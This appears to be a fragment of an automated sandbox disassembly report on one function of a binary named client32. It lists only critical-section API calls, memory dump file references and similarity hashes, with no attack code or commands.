                                                                                Function 1100D8B0 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(111EDE2C,00000000,?,?,1100C26B,00000000,00000000), ref: 1100D8BF
                                                                                • LeaveCriticalSection.KERNEL32(111EDE2C,?,?,1100C26B,00000000,00000000), ref: 1100D930
                                                                                  • Part of subcall function 1100D820: EnterCriticalSection.KERNEL32(111EDE2C,1100CB7A,?,1100B5DC,?,00000000,?,1100CB7A,?), ref: 1100D829
                                                                                  • Part of subcall function 1100D820: LeaveCriticalSection.KERNEL32(111EDE2C,1100B5DC,?,00000000,?,1100CB7A,?), ref: 1100D8A1
                                                                                • LeaveCriticalSection.KERNEL32(111EDE2C), ref: 1100D8FF
                                                                                • LeaveCriticalSection.KERNEL32(111EDE2C), ref: 1100D91B
                                                                                  • Part of subcall function 1100D7D0: EnterCriticalSection.KERNEL32(111EDE2C,1100C4FB), ref: 1100D7D5
                                                                                  • Part of subcall function 1100D7D0: LeaveCriticalSection.KERNEL32(111EDE2C), ref: 1100D80F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$Enter
                                                                                • String ID:
                                                                                • API String ID: 2978645861-0
                                                                                • Opcode ID: 10c14cb9c45534fd9ad9362a8b8fd8fef3d09697d59f75ad4657c47dcd1b45a9
                                                                                • Instruction ID: 024bf54fe56583fc36b1911af5d7f6a9c338d46169c8d4f8be6289797e831c79
                                                                                • Opcode Fuzzy Hash: 10c14cb9c45534fd9ad9362a8b8fd8fef3d09697d59f75ad4657c47dcd1b45a9
                                                                                • Instruction Fuzzy Hash: 52018835E0113C6BEB00DBE9ED4D5ADB7A9EB04B9AB4001A6FD18D3A04E631AD0087E1